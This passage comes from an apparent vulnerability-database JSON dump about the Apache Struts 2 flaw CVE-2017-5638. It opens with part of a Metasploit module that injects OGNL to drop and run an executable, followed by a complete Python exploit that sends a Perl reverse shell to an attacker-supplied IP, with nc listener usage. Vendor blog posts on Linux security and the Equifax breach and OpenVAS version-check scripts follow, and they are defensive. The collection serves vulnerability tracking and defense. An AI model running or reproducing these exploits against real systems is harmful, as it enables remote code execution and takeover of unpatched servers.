\n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') \nend \nresp \nend \n \ndef execute_command(cmd) \nognl = '' \nognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \n \n# You can add headers to the server's response for debugging with this: \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('decoded',#cmd)).| \n \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).| \nognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start())| \n \nsend_struts_request(ognl, extra_header: cmd) \nend \n \ndef send_payload(exe) \n \nognl = \"\" \nognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).| \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#fos=new java.io.FileOutputStream(#f)).| \n \n# Using stuff from the sun.* package here means it likely won't work on \n# non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to \n# work and I don't see a better way of getting binary data onto the \n# system. =/ \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).| \nognl << %q|(#fos.write(#d)).| \nognl << %q|(#fos.close()).| \n \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete())| \n \nsend_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\")) \nend \n \nend \n \n=begin \nDoesn't work: \n \nognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).| \nognl << %q|(#c=#cl.loadClass('metasploit.Payload')).| \nognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).| \nognl << %q|(#r.addHeader('meth',#m.toGenericString())).| \nognl << %q|(#m.invoke(null,null)).| \n \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6 \n \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884 \n \n=end \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ \n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2017-06-26T21:16:51", "description": "\n\n**_\u201cThere are no threats for Linux servers. Aren\u2019t they built to be secure?\u201d_**\n\n**_\u201cLinux servers are secure and hardened, why do we need additional security controls on those?\u201d_**\n\n**_\u201cI do understand there are threats out there but I am not aware of any major attacks on Linux servers\u201d_**\n\nIf you find yourself nodding as you read these statements, you\u2019re not alone.\n\nThere is a common belief that Linux servers are more secure and less vulnerable than Windows servers.\n\nAlthough there is some truth in the belief, the reality is that Linux servers (and the applications they host) also have vulnerabilities and by ignoring this, you are putting your business at unnecessary risk.\n\n**Widespread and increasing use**\n\nThere was a time not too long ago when Linux was a \u2018geek\u2019 OS, the domain of command line management and limited enterprise use. Those days are definitely gone, clearly illustrated by things like Gartner pegging the global OS growth for Linux at 13.5%[1], as well as the prevalence of Linux in the public cloud environment, as demonstrated by the fact that [approximately 90% of workloads in AWS EC2](<http://thecloudmarket.com/stats#/by_platform_definition>) are running some variant of Linux. With such widespread use for sensitive enterprise applications, it\u2019s no small wonder that there is an increasing focus on attacking Linux servers, as evidenced in the recent ransomware attack in South Korea that used a [Linux-focused ransomware attack called Erebus](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/erebus-linux-ransomware-impact-to-servers-and-countermeasures>) that impacted the web sites, databases, and multi-media files of 3,400 businesses.\n\n**Secure, but still vulnerable**\n\nWith more and more servers moving beyond the enterprise boundary and into the cloud, network protection at the host-level becomes increasingly important, as workloads need to defend themselves vs. having a perimeter around them. And remember, workloads include the applications that sit on top of Linux\u2026it\u2019s more than just the OS.\n\nHaving a host-based Intrusion Prevention System (IPS) will help protect against vulnerabilities in core operating system AND the application stack running on top. Great examples of network-accessible vulnerabilities with wide-spread impacts are the recent [Apache Struts-2](<http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/>) issue, Heartbleed and Shellshock, but there are many more. And just because a vulnerability, like Heartbleed, is a couple years old doesn\u2019t mean that applications and servers are not still vulnerable. In a recent Shodan survey, it showed that Heartbleed was still an available vulnerability on more than 180,000 servers around the world, with the majority of them in the US!\n\n[1] Gartner, \u201cMarket Share Analysis: Server Operating Systems, Worldwide, 2016\u201d, ID#G00318388, May 26, 2017\n\n\n\nIf you run a web server on Linux (running on at least 37 percent of the web servers out there according to [W3Techs](<https://w3techs.com/technologies/details/os-linux/all/all>)), you need protection against vulnerabilities affecting them, including Apache, Nginx, etc.\n\n \n\n** ** | **Vulnerabilities Covered in and after 2014 (approx.)** | **Before 2014 (approx.)** | **Total** \n---|---|---|--- \n**Non-Windows OS and Core Services** | **80** | **230** | **310** \n**Web Servers** | **114** | **472** | **586** \n**Application Servers** | **255** | **319** | **574** \n**Web Console/Management Interfaces** | **113** | **453** | **566** \n**Database Servers** | **10** | **218** | **228** \n**DHCP, FTP, DNS servers** | **9** | **82** | **91** \n \n_Table 1: Vulnerabilities Protected by Deep Security_\n\n \n\nIt is very important to not confuse vulnerabilities with threats. While there may be fewer known threats for Linux, if you look at the National Vulnerability Database, there are a similar number of vulnerabilities reported for both [Linux](<https://nvd.nist.gov/vuln/search/results?adv_search=false&form_type=basic&results_type=overview&search_type=all&query=linux>), and [Windows](<https://nvd.nist.gov/vuln/search/results?adv_search=false&form_type=basic&results_type=overview&search_type=all&query=windows>) operating systems.\n\n**Malware, designed for Linux**\n\nContrary to popular belief, there is a lot of malware for the Linux platform. While the numbers in comparison to Microsoft Windows are not quite as high, there are still tens of thousands of pieces of malware designed for Linux, including the [Erebus ransomware](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/erebus-linux-ransomware-impact-to-servers-and-countermeasures>) mentioned above.\n\nDeploying ONLY anti-malware is inadequate for protecting servers. However, most attacks on datacenters that lead to breach involve the installation of malware as part of the attack chain. This is why compliance and security frameworks such as PCI-DSS (Section #3), SANS CIS Critical Security Controls (Section #8), and NIST Cybersecurity Framework (Section DE.CM-4) all continue to recommend anti-malware as a best practice.\n\n**Layered security for Linux workloads**\n\nIt\u2019s clear that there is no silver bullet when it comes to server security, and that businesses should be using a layered security approach to protect vulnerable Linux workloads. Beyond anti-malware and IPS, there are a number of controls that will help to build a robust Linux strategy:\n\n| \n\n * Application Control: helps \u2018lock down\u2019 the Linux host to prevent any unknown process or script from running. This prevents the malware from running in the first place or attackers from taking advantage of backdoors that it might have placed on the server.\n * Integrity Monitoring: A new threat is likely to make changes to the system somewhere (ports, protocol changes, files), so it\u2019s important to watch for these. Integrity monitoring helps with monitoring the system for any changes outside of an authorized change window, which tend to be few for typical production workloads.\n * Log Inspection: Scans log files and provides a continuous monitoring process to help identify threats early in the cycle. Attacks like SQL Injection, command injection, attacks against APIs can be seen in the logs and then action taken. \n---|--- \n| \n \nThe lesson we learn here is that although Linux is a more secure and reliable operating system option, it\u2019s not your cure-all solution when it comes to security. Like any other OS, some assembly and maintenance is required, and it\u2019s your responsibility to adopt a multi-layered security strategy, including managing regular updates and adding additional security controls to protect the servers AND the applications running on them. To learn more about Linux vulnerabilities and how to protect against them using Trend Micro Deep Security, [read our short research paper here.](<https://www.trendmicro.com/aws/wp-content/uploads/2017/03/Why_Security_for_Linux_Servers_June2017.pdf>)", "cvss3": {}, "published": "2017-06-15T19:00:13", "type": "trendmicroblog", "title": "Linux is secure\u2026right?", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-15T19:00:13", "id": "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "href": "http://blog.trendmicro.com/linux-is-secureright/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-07T13:45:17", "description": "\n\nOne year ago today, Equifax suffered what remains one of the largest and most impactful data breaches in U.S. history. Last September, it was revealed that the personal information of [145 million Americans](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), almost [700,000 UK citizens](<https://www.equifax.co.uk/incident.html>), and [19,000 Canadians](<https://www.cbc.ca/news/business/equifax-canadians-affected-update-1.4424066>) was stolen by cybercriminals.\n\nThis information included names, addresses, birthdays, Social Security numbers, and\u2014in some cases\u2014driver's licenses. All critical, personally identifiable information (PII) that can resold in the underground and used to commit identity fraud.\n\nThis breach had very real impact on the millions affected. On Equifax? Or the industry as a whole? Not so much\u2026\n\nThe result is that your personal information remains \"entrusted\" with various agencies without your knowledge. Agencies that may or may not have your best interests at heart. A year after the Equifax breach, your data has never been at greater risk. **Why?**\n\nThe Equifax breach made international headlines for weeks. It's a story that has corporate intrigue, political uproar, and controversy\u2026yet nothing really has changed.\n\n## What Happened?\n\nCybercriminals gained access to Equifax's systems through a [known vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) in Apache Struts (a web application framework). This easily exploited vulnerability has been left unpatched and unmitigated by Equifax for weeks.\n\nWhen Equifax discovered the breach, they waited weeks to notify affected individuals and the general public. That notification came in the form of an insecure site on a new domain name. This contributed to the [criticism](<https://en.wikipedia.org/wiki/Equifax#Criticism>) the company faced as they bumbled the response.\n\n[The saga](<https://en.wikipedia.org/wiki/Equifax#May\u2013July_2017_data_breach>) took a number of twists and unexpected turns as [executives were accused](<https://www.theglobeandmail.com/business/international-business/us-business/article-former-equifax-employee-charged-in-us-with-insider-trading/>) of [insider trading](<https://www.theguardian.com/business/2018/mar/14/equifax-insider-trading-data-breach-jun-ying-charged>), having sold shared valued at $1.8 million dollars after the breach was discovered but before the public announcement. The [CIO and CISO](<https://techcrunch.com/2017/09/15/equifax-security-and-information-executives-are-stepping-down/>) stepped down in the wake of the breach. As the company continued to see pushback, political and consumer frustration, the [CEO eventually resigned](<https://www.npr.org/2017/09/26/553799200/equifax-ceo-richard-smith-resigns-after-backlash-over-massive-data-breach>) allowing the company to try and turn the page.\n\nAfter all, Equifax had the tools, people, and process in place to prevent the breach but simply dropped the ball\u2026with catastrophic results.\n\n## Customers?\n\nOne of the biggest challenges in light of this breach was the relationship that Equifax had with the affected individuals. Equifax maintained a significant amount of [personally identifiable information](<https://en.wikipedia.org/wiki/Personally_identifiable_information>) on hundreds of millions of individuals in the US and around the world yet very few of these individuals had a direct relationship with the company.\n\nEquifax and a handful of other [consumer credit reporting agencies](<https://www.thebalance.com/who-are-the-three-major-credit-bureaus-960416>) make their money by selling customer profiles and credit ratings to other business, essentially acting as massive reputation clearing houses.\n\nGiven the role played by these agencies, individuals in the US have alarmingly few actions they can take in recourse to an error or breach of their information in care of such an agency. This was a key point raised in the uproar after the Equifax breach.\n\nOne year later, let's check in on the progress made so far\u2026\n\n## Lack of Personal Data Protections\n\nAlarmingly, there has been no federal action and only one state has passed legislation regarding personal data protections since the Equifax breach.\n\nIn June, California passed the California Consumer Privacy Act of 2018 ([AB 375](<https://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=201720180AB375>)). This landmark legislation takes a much needed step towards personal data protections in the state of California. While not [the driving factor](<https://www.nytimes.com/2018/05/13/business/california-data-privacy-ballot-measure.html>) for the legislation, the breach contributed to awareness of the need for such protections.\n\nThis protects Californian's in a similar manner to European's under GDPR. If either piece of legislation was in effect during the Equifax breach, the company [would have been looking at major fines](<https://www.darkreading.com/equifax-avoided-fines-but-what-if-/a/d-id/1332487?>).\n\n## What Now?\n\nDespite the initial uproar, very little has happened in wake of the Equifax breach. The creation of strict regulation in the EU had been underway for years. The initiative in California had already been underway when this breach happened.\n\nDespite the outrage, very little came of the breach outside of Equifax itself. They brought in new leadership and have tried to [shift the security culture](<https://www.wired.com/story/equifax-security-overhaul-year-after-breach/>), both solid steps. The [consent letter](<http://www.latimes.com/business/la-fi-equifax-settlement-20180627-story.html#>) signed will help ensure that Equifax continues to build a strong security culture but it doesn't impact any of the other agencies.\n\nIs this the future? As more and more companies move to monetize data and customer behaviours, a [lack of political will](<https://www.axios.com/after-equifaxs-mega-breach-nothing-changed-1536241622-baf8e0cf-d727-43db-b4d4-77c7599fff1e.html>) and a lack of consumer pressure means that **YOUR** data remains at risk.\n\nRegulation is always challenging but it's clear that the market isn't providing a solution as few of the affected individuals have a relationship with the companies holding the data. Your personal information is just that\u2026yours and very personal.\n\nIndividuals need the ability to hold organizations that put that information at risk accountable.\n\nThe post [Sound, Fury, And Nothing One Year After Equifax](<https://blog.trendmicro.com/sound-fury-and-nothing-one-year-after-equifax/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2018-09-07T12:00:34", "type": "trendmicroblog", "title": "Sound, Fury, And Nothing One Year After Equifax", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-07T12:00:34", "id": "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152", "href": "https://blog.trendmicro.com/sound-fury-and-nothing-one-year-after-equifax/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:34:11", "description": "Cisco ISE is prone to a vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "openvas", "title": "Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ise_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:identity_services_engine\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106640\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco ISE is prone to a vulnerability in Apache Struts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-13 11:35:28 +0700 (Mon, 13 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ise_version.nasl\");\n script_mandatory_keys(\"cisco_ise/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list('1.3.0.876',\n '1.4.0.253',\n '2.0.0.306',\n '2.2.0.470',\n '2.0.1.130',\n '2.1.0.474',\n '2.2.0.471');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n script_tag(name:\"insight\", 